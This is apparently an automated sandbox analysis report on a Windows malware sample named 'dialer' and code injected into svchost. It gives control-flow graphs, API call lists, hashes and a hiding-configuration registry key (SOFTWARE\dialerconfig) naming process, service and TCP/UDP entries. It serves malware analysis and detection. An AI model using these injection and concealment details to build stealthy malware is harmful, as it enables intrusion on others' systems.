                                                                          control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 432 140001bf3-140001c02 430->432 433 140001be0-140001be7 430->433 438 140001cf4-140001cfe call 140001d40 431->438 439 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->439 432->433 435 140001c04 432->435 433->430 433->431 437 140001cd7-140001cf3 memcpy 435->437 443 140001d03-140001d1e call 140001d40 438->443 439->443 444 140001c72-140001c79 439->444 446 140001d23-140001d38 GetLastError call 140001d40 443->446 447 140001c7b-140001c7e 444->447 448 140001c8e-140001c97 444->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->437 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                          • Instruction ID: 43a0cbb6118ac9185dba083df37bfa5a8251914ca7472923389a44b33500f4d1
                                                                          • Opcode Fuzzy Hash: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                          • Instruction Fuzzy Hash: BC4153F1601A4486FA26DF47F884BE927A0E78DBC4F584122EF0E877B1DA38C586C300
                                                                          Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 926137887-0
                                                                          • Opcode ID: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                          • Instruction ID: a4e62dc8e7d81a00801526d2a511ced90750e179f40fb15ec58be7477c50376c
                                                                          • Opcode Fuzzy Hash: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                          • Instruction Fuzzy Hash: F221E3B0715A0292FA1BDB53F9483E92360B76CBD0F444161EB1E47AB4DB7A8986C300
                                                                          Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 491 140001b87-140001b98 call 140001d40 488->491 492 140001a2c-140001a37 488->492 493 140001970-14000199c call 140001ba0 489->493 490->476 494 1400019a8-1400019c1 490->494 492->490 496 140001a3d-140001a5f 492->496 493->490 495 1400019df-1400019e7 494->495 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->491 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
                                                                          • Instruction ID: 2d94c89a0dbc5eaf2f8d64577ab743d1a622af76d4dc519d29f5ea4fbe6584bb
                                                                          • Opcode Fuzzy Hash: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
                                                                          • Instruction Fuzzy Hash: 245114B6B11544DAEB16CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                          Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                          • Instruction ID: 7f685618ca937b17e8a77ff3462c9f9b221cac2c692d946b3ecbcedae4a5563c
                                                                          • Opcode Fuzzy Hash: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                          • Instruction Fuzzy Hash: 15F09671A14A4482E612EF6AB9417ED6360E75D7C1F50D221FF4E576A6DF3CD182C310
                                                                          Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                          • Instruction ID: fa24f775fc133e2fb8ddb0fda3fc4b66b3fc9b3ea8c54cca86470a464386792f
                                                                          • Opcode Fuzzy Hash: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                          • Instruction Fuzzy Hash: 4F01B2B5705A0192FA1BDB53FE083E86360B76CBD1F454061EF0953AB4DF79C996C200

                                                                          Execution Graph

                                                                          Execution Coverage:56.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:87.5%
                                                                          Total number of Nodes:8
                                                                          Total number of Limit Nodes:1

                                                                          Callgraph

                                                                          • Executed
                                                                          • Not Executed
                                                                          • Opacity -> Relevance
                                                                          • Disassembly available
                                                                          callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                                          Executed Functions

                                                                          Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000041.00000002.3278592017.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000041.00000002.3278536247.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000041.00000002.3278592017.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000041.00000002.3278592017.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000041.00000002.3278592017.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000041.00000002.3278592017.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000041.00000002.3278592017.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000041.00000002.3280646006.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 1941872368-0
                                                                          • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                          • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                                          Execution Graph

                                                                          Execution Coverage:0.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:81
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 14867 257e107273c 14869 257e107276a 14867->14869 14868 257e10728d4 14869->14868 14870 257e1072858 LoadLibraryA 14869->14870 14870->14869 14871 257e10a1abc 14877 257e10a1628 GetProcessHeap 14871->14877 14873 257e10a1ad2 Sleep SleepEx 14875 257e10a1acb 14873->14875 14875->14873 14876 257e10a1598 StrCmpIW StrCmpW 14875->14876 14922 257e10a18b4 14875->14922 14876->14875 14878 257e10a1648 _invalid_parameter_noinfo 14877->14878 14939 257e10a1268 GetProcessHeap 14878->14939 14880 257e10a1650 14881 257e10a1268 2 API calls 14880->14881 14882 257e10a1661 14881->14882 14883 257e10a1268 2 API calls 14882->14883 14884 257e10a166a 14883->14884 14885 257e10a1268 2 API calls 14884->14885 14886 257e10a1673 14885->14886 14887 257e10a168e RegOpenKeyExW 14886->14887 14888 257e10a16c0 RegOpenKeyExW 14887->14888 14889 257e10a18a6 14887->14889 14890 257e10a16ff RegOpenKeyExW 14888->14890 14891 257e10a16e9 14888->14891 14889->14875 14893 257e10a1723 14890->14893 14894 257e10a173a RegOpenKeyExW 14890->14894 14943 257e10a12bc RegQueryInfoKeyW 14891->14943 14954 257e10a104c RegQueryInfoKeyW 14893->14954 14897 257e10a1775 RegOpenKeyExW 14894->14897 14898 257e10a175e 14894->14898 14895 257e10a16f5 RegCloseKey 14895->14890 14901 257e10a17b0 RegOpenKeyExW 14897->14901 14902 257e10a1799 14897->14902 14900 257e10a12bc 11 API calls 14898->14900 14905 257e10a176b RegCloseKey 14900->14905 14903 257e10a17d4 14901->14903 14904 257e10a17eb RegOpenKeyExW 14901->14904 14906 257e10a12bc 11 API calls 14902->14906 14907 257e10a12bc 11 API calls 14903->14907 14908 257e10a180f 14904->14908 14909 257e10a1826 RegOpenKeyExW 14904->14909 14905->14897 14910 257e10a17a6 RegCloseKey 14906->14910 14911 257e10a17e1 RegCloseKey 14907->14911 14912 257e10a104c 4 API calls 14908->14912 14913 257e10a1861 RegOpenKeyExW 14909->14913 14914 257e10a184a 14909->14914 14910->14901 14911->14904 14915 257e10a181c RegCloseKey 14912->14915 14917 257e10a1885 14913->14917 14918 257e10a189c RegCloseKey 14913->14918 14916 257e10a104c 4 API calls 14914->14916 14915->14909 14919 257e10a1857 RegCloseKey 14916->14919 14920 257e10a104c 4 API calls 14917->14920 14918->14889 14919->14913 14921 257e10a1892 RegCloseKey 14920->14921 14921->14918 14966 257e10a14a4 14922->14966 14960 257e10b6168 14939->14960 14941 257e10a1283 GetProcessHeap 14942 257e10a12ae _invalid_parameter_noinfo 14941->14942 14942->14880 14944 257e10a148a Concurrency::details::SchedulerProxy::DeleteThis 14943->14944 14945 257e10a1327 GetProcessHeap 14943->14945 14944->14895 14948 257e10a133e _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 14945->14948 14946 257e10a1352 RegEnumValueW 14946->14948 14947 257e10a1476 GetProcessHeap 14947->14944 14948->14946 14948->14947 14950 257e10a13d3 GetProcessHeap 14948->14950 14951 257e10a141e lstrlenW GetProcessHeap 14948->14951 14952 257e10a13f3 GetProcessHeap 14948->14952 14953 257e10a1443 StrCpyW 14948->14953 14961 257e10a152c 14948->14961 14950->14948 14951->14948 14952->14948 14953->14948 14955 257e10a11b5 RegCloseKey 14954->14955 14958 257e10a10bf _invalid_parameter_noinfo Concurrency::details::SchedulerProxy::DeleteThis 14954->14958 14955->14894 14956 257e10a10cf RegEnumValueW 14956->14958 14957 257e10a114e GetProcessHeap 14957->14958 14958->14955 14958->14956 14958->14957 14959 257e10a116e GetProcessHeap 14958->14959 14959->14958 14962 257e10a157c 14961->14962 14965 257e10a1546 14961->14965 14962->14948 14963 257e10a1565 StrCmpW 14963->14965 14964 257e10a155d StrCmpIW 14964->14965 14965->14962 14965->14963 14965->14964 14967 257e10a14e1 GetProcessHeap 14966->14967 14968 257e10a14c1 GetProcessHeap 14966->14968 14972 257e10b6180 14967->14972 14969 257e10a14da Concurrency::details::SchedulerProxy::DeleteThis 14968->14969 14969->14967 14969->14968 14973 257e10b6182 14972->14973

                                                                          Executed Functions

                                                                          Function 00000257E10A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358
                                                                          Function 00000257E10A328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C
                                                                          Function 00000257E10A1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
                                                                            • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
                                                                          • Sleep.KERNEL32 ref: 00000257E10A1AD7
                                                                          • SleepEx.KERNELBASE ref: 00000257E10A1ADD
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228
                                                                          Function 00000257E107273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 110 257e107273c-257e10727a4 call 257e10729d4 * 4 119 257e10727aa-257e10727ad 110->119 120 257e10729b2 110->120 119->120 122 257e10727b3-257e10727b6 119->122 121 257e10729b4-257e10729d0 120->121 122->120 123 257e10727bc-257e10727bf 122->123 123->120 124 257e10727c5-257e10727e6 123->124 124->120 126 257e10727ec-257e107280c 124->126 127 257e107280e-257e1072836 126->127 128 257e1072838-257e107283f 126->128 127->127 127->128 129 257e1072845-257e1072852 128->129 130 257e10728df-257e10728e6 128->130 129->130 133 257e1072858-257e107286a LoadLibraryA 129->133 131 257e10728ec-257e1072901 130->131 132 257e1072992-257e10729b0 130->132 131->132 134 257e1072907 131->134 132->121 135 257e107286c-257e1072878 133->135 136 257e10728ca-257e10728d2 133->136 139 257e107290d-257e1072921 134->139 140 257e10728c5-257e10728c8 135->140 136->133 137 257e10728d4-257e10728d9 136->137 137->130 142 257e1072923-257e1072934 139->142 143 257e1072982-257e107298c 139->143 140->136 141 257e107287a-257e107287d 140->141 147 257e10728a7-257e10728b7 141->147 148 257e107287f-257e10728a5 141->148 145 257e1072936-257e107293d 142->145 146 257e107293f-257e1072943 142->146 143->132 143->139 149 257e1072970-257e1072980 145->149 150 257e107294d-257e1072951 146->150 151 257e1072945-257e107294b 146->151 152 257e10728ba-257e10728c1 147->152 148->152 149->142 149->143 153 257e1072963-257e1072967 150->153 154 257e1072953-257e1072961 150->154 151->149 152->140 153->149 156 257e1072969-257e107296c 153->156 154->149 156->149
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

                                                                          Non-executed Functions

                                                                          Function 00000257E10A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
